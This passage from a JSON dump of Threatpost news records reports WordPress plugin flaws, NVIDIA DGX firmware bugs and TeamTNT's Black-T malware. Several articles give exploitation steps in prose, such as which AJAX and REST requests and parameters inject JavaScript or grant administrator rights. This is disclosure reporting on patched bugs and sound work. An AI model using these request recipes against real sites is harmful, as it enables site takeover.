such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,\u201d researchers explained in the post.\n\nFor instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user\u2019s browser.\n\nThe second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CvSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or \u201cany number of other tactics that could lead to site takeover,\u201d the firm warned.\n\n\u201cAlthough the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,\u201d according to Wordfence. \u201cThis introduced a PHP object-injection vulnerability via the restore_options_from_request function.\u201d\n\nIn terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and \u201cclean up\u201d once a pre-defined, legitimate process is completed. An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it\u2019s done.\n\nIf this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site\u2019s core configuration settings by sending a specially crafted payload.\n\n\u201cThe deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site\u2019s new configuration to a remote database under their control,\u201d explained Wordfence.\n\nThe researchers added that to be successful, an attacker would need to know which plugins are installed on a given site \u2013 which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.\n\n## **WordPress Plugin Bugs Proliferate**\n\nWordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week [just such a bug was found](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nEarlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-04T18:11:18", "type": "threatpost", "title": "Newsletter WordPress Plugin Opens Door to Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-04T18:11:18", "id": "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "href": "https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:58", "description": "Two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, opens the door to site takeovers, according to researchers. To boot, nearly identical bugs are also found in Post Grid\u2019s sister plug-in, Team Showcase, which has 6,000 installations.\n\nThe issues are a cross-site scripting (XSS) flaw as well as a PHP object-injection issue. Both bugs are pending CVE numbers, and both are high-severity, rating 7.5 out of 10 on the CvSS vulnerability rating scale.\n\nPost Grid, true to its name, allows users to display their posts in a grid layout; meanwhile, Team Showcase offers a way to easily highlight an organization\u2019s team members. Both allowed the import of custom layouts, and used nearly identical \u2013 and vulnerable \u2013 functions for doing so, according to Ram Gall, researcher with Wordfence.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe XSS bug would allow an attacker to supply a source parameter pointing to a crafted malicious payload hosted elsewhere. The function would then open the file containing the payload, decode it and create a new page layout based on its contents.\n\n\u201cThe created layout included a custom_scripts section, and an attacker could add malicious JavaScript to the custom_css portion of this section,\u201d explained Gall, [in a posting](<https://www.wordfence.com/blog/2020/10/high-severity-vulnerabilities-in-post-grid-and-team-showcase-plugins/>) on Monday. \u201cThis would then be executed whenever an administrative user edited the layout or a visitor visited a page based on the layout.\u201d\n\nThe upshot is that attackers could use the malicious JavaScript to add a malicious administrator, add a backdoor to plugin or theme files, or steal the administrator\u2019s session information \u2013 all of which are paths to complete takeover of a site.\n\nTriggering an exploit is also somewhat trivial.\n\n\u201cIn both cases, a logged-in attacker with minimal permissions such as subscriber could trigger the functions by sending an AJAX request, with the action set to post_grid_import_xml_layouts for the Post Grid plugin or team_import_xml_layouts for the Team Showcase plugin, with each action triggering a function with the same name,\u201d Gall explained.\n\nThe second issue, the PHP object-injection bug, arises in the import function because it unserialized the payload supplied in the source parameter. An attacker could therefore execute arbitrary code, delete or write files, or perform any number of other actions which could lead to site takeover.\n\nTo trigger the flaw, \u201can attacker could craft a string that would be unserialized into an active PHP object,\u201d Gall explained. \u201cAlthough neither plugin utilized any vulnerable magic methods, if another plugin using a vulnerable magic method was installed, Object injection could be used by an attacker.\u201d\n\nBoth vulnerabilities would typically require the attacker to have an account with at least subscriber level privileges \u2013 but there\u2019s a loophole.\n\n\u201cHowever, sites using a plugin or theme that allowed unauthenticated visitors to execute arbitrary shortcodes would be vulnerable to unauthenticated attackers,\u201d Gall added.\n\nThe plugins\u2019 developer, PickPlugins, has issued patches, so web admins should upgrade as soon as possible. The fixed versions are Post Grid v. 2.0.73 and Team Showcase v. 1.22.16.\n\nThese are the latest in the line of faulty WordPress plugins that have come to light this year. In September, a high-severity flaw in the Email Subscribers &amp; Newsletters plugin by Icegram [was found to affect](<https://threatpost.com/wordpress-plugin-flaw/159172/>) more than 100,000 WordPress websites.\n\n[Earlier in August](<https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/>), a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites. [Also in August,](<https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/>) Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nAnd, [researchers in July warned](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-05T21:11:44", "type": "threatpost", "title": "Post Grid WordPress Plugin Flaws Allow Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T21:11:44", "id": "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "href": "https://threatpost.com/wordpress-plugin-flaws/159856/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:39:12", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain. NVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "href": "https://threatpost.com/nvidia-patches-critical-bug-in-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T23:46:43", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to its own firmware that runs on its DGX AMI baseboard management controller (BMC), the brains behind a remote monitoring service servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. \u201cIf you have access to OOB, it is game is over for the target.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain,\u201d he said. \u201cNVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "href": "https://threatpost.com/nvidia-critical-bug-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:26:52", "description": "A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It\u2019s a WordPress plugin with more than 200,000 installations.\n\nAccording to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site.\n\nThe second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is \u201cWordPress SEO Plugin \u2013 Rank Math\u201d) \u2013 and CVE tracking numbers are forthcoming, researchers said, [in an analysis](<https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/>) released Tuesday. A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites.\n\n**Critical Metadata Flaw**\n\nRank Math allows users to update the metadata on website posts \u2013 which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence.\n\nThe plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called \u201cupdate_metadata,\u201d which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments and terms. This endpoint also allows for updating metadata for users.\n\nThe issue is that in non-patched versions, the endpoint fails to include a permissions check on users making changes.\n\n\u201cWordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant any registered user administrative privileges by sending a $_POST request to wp-json/rankmath/v1/updateMeta, with an objectID parameter set to the User ID to be modified, an objectType parameter set to user, a meta[wp_user_level] parameter set to 10, and a meta[wp_capabilities][administrator] parameter set to 1,\u201d the analysis noted.\n\nA nefarious type could also completely revoke an existing administrator\u2019s privileges by sending a similar request with a meta[wp_user_level] parameter and a meta[wp_capabilities] parameter set to empty values, the researchers added, effectively locking administrators out of their own sites.\n\n\u201cNote that these attacks are only the most critical possibilities. Depending on the other plugins installed on a site, the ability to update post, term and comment metadata could potentially be used for many other exploits such as cross-site scripting (XSS),\u201d the researchers commented.\n\n**Malicious Redirect Bonanza**\n\nThe Rank Math plugin also comes with an optional module that can be used to create redirects on a site. An administrator might do this to direct visitors away from pages under construction, for example.\n\nIn order to add this feature, the plugin registers a REST-API endpoint for this too, called \u201crankmath/v1/updateRedirection.\u201d And, like the other vulnerability, this endpoint fails to execute a permissions check, according to Wordfence \u2013 which means that an attacker could easily create new redirects or modify existing redirects. As such, the attack could essentially be used to prevent access to almost all of a site\u2019s existing content, according to the analysis, by simply redirecting visitors to a malicious site.\n\n\u201cIn order to perform this attack, an unauthenticated attacker could send a $_POST request to rankmath/v1/updateRedirection with a redirectionUrl parameter set to the location they wanted the redirect to go to, a redirectionSources parameter set to the location to redirect from, and a hasRedirect parameter set to true,\u201d Wordfence researchers wrote.\n\nThere is, however, a caveat that accounts for the lower-severity rating of the bug: \u201cThe redirect could not be set to an existing file or folder on the server, including the site\u2019s main page,\u201d according to the analysis. \u201cThis limited the damage to some extent in that, while an attacker could create a redirect from most locations on the site, including new locations, or any existing post or page other than the homepage, they could not redirect visitors immediately upon accessing the site.\u201d\n\nWeb admins can mitigate the issues by building in a \u201cpermission_callback\u201d on any REST-API endpoints, or by updating to the latest version of the plug-in.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T18:03:01", "type": "threatpost", "title": "Critical WordPress Plugin Bug Can Lock Admins Out of Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T18:03:01", "id": "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "href": "https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:09:04", "description": "Researchers have discovered the latest cryptojacking malware gambit from TeamTNT, called Black-T. The variant builds on the group\u2019s typical approach, with a few new \u2014 and sophisticated \u2014 extras.\n\nTeamTNT is known for its targeting of Amazon Web Services (AWS) credentials, to break into the cloud and use it to mine for the [Monero](<https://threatpost.com/monero-cybercrime-mining-malware/141116/>) cryptocurrency. But according to researchers with Palo Alto Network\u2019s Unit 42, with [Black-T](<https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/>), the group has added in additional capabilities to its tactics, techniques and procedures (TTPs). These include the addition of sophisticated network scanners; the targeting of competitor XMR mining tools on the network; and the use of password scrapers.\n\nWhat TeamTNT plans to do with the saved passwords and additional capabilities is still unclear, but the development signals that the group doesn\u2019t plan to slow down anytime soon.\n\nIn August, [TeamTNT was identified by researchers](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) as the first cryptojacking group to specifically target AWS. With increasingly sophisticated TTPs, the cybercriminal gang appears to be gaining steady momentum. Just last month, TeamTNT was discovered to have been leveraging a common open-source cloud monitoring tool called [Weave Scope, to infiltrate the cloud](<https://threatpost.com/teamtnt-remote-takeover-cloud-instances/159075/>) and execute commands without breaching the server.\n\nBlack-T represents a notable jump forward in the operation\u2019s sophistication, researchers said.\n\nOnce deployed, the first order of business for Black-T is to disable any other malware competing for processing power, including Kinsing, Kswapd0, ntpd miner, redis-backup miner, auditd miner, Migration miner, the Crux worm and Crux worm miner. Ironically, the fact that TeamTNT identified these competitors in their malware gives security professionals a critical heads-up to be on the lookout for potential threats from these groups, Unit 42 said.\n\nThis kind of cyberjacking turf warfare isn\u2019t new, but it appears to be accelerating.\n\n\u201cThe battle for cloud resources will continue well into the future,\u201d Nathaniel Quist, senior threat researcher for Unit 42 said. \u201cIn the past, attacker groups like [Rocke](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) and [Pacha](<https://www.paloaltonetworks.com/resources/research/digital-executive-summary-unit-42-cloud-threat-report-spring-2020>) would battle for resources. TeamTNT is battling with Kinsing malware and Crux worm today. I believe that this battle for resources will increase and attacker groups will look for other opportunities to use cloud resources. We can see this now with TeamTNT collecting passwords and AWS credentials in an attempt to expand and maintain a cloud presence.\u201d\n\nAfter it eliminates the competition, Black-T installs masscan, libpcap to listen to various resources on the network, including pnscan, zgrab, Docker and jq (the latter is a flexible command-line JSON processor, according to Unit 42).\n\n\u201cTeamTNT is investing more resources into scanning operations, likely with the intent to identify and compromise more cloud systems,\u201d Quist added. \u201cZmap is a known open-source scanning solution and with the creation of zgrab, a GoLang tool written for zmap, it is attempting to capitalize on the added benefits of the Go programming language, such as speed and performance increases. It is likely that TeamTNT actors are attempting to refine their scanning capabilities to make them faster, more accurate and less resource-intensive.\u201d\n\nNext, Black-T fetches various downloads: Beta to create a new directory; the mimipy and mimipenquin password scraping tools; and the XMR mining software called bd.\n\n\u201cThe inclusion of memory password-scraping tools should be considered an evolution of tactics,\u201d Quist said. \u201cTeamTNT has already integrated the collection and exfiltration of AWS credentials from compromised cloud systems, which provides post-exploitation capabilities. By adding memory password-scraping capabilities, TeamTNT actors are increasing their chances in gaining persistence within cloud environments.\u201d\n\nThe use of [worms](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) like masscan or pnscan by TeamTNT isn\u2019t new, but Unit 42 noticed Black-T adds a new scanning port. Researchers wonder whether this signals the group has figured out how to target Android devices as well.\n\nAs remote work and cost savings continue to drive computing to the cloud, more groups like TeamTNT are sure to emerge ready to take advantage, according to Quist. Admins should take steps to ensure that [Docker](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) and daemon APIs, as well as any other sensitive network services, aren\u2019t exposed, so that the cloud can be protected from the next evolution of cloud cryptojackers, he added.\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar. **\n", "cvss3": {}, "published": "2020-10-05T19:47:05", "type": "threatpost", "title": "Black-T Malware Emerges From Cryptojacker Group TeamTNT", "bulletinFamily": "info", "cvss2": {}, "cvelist": 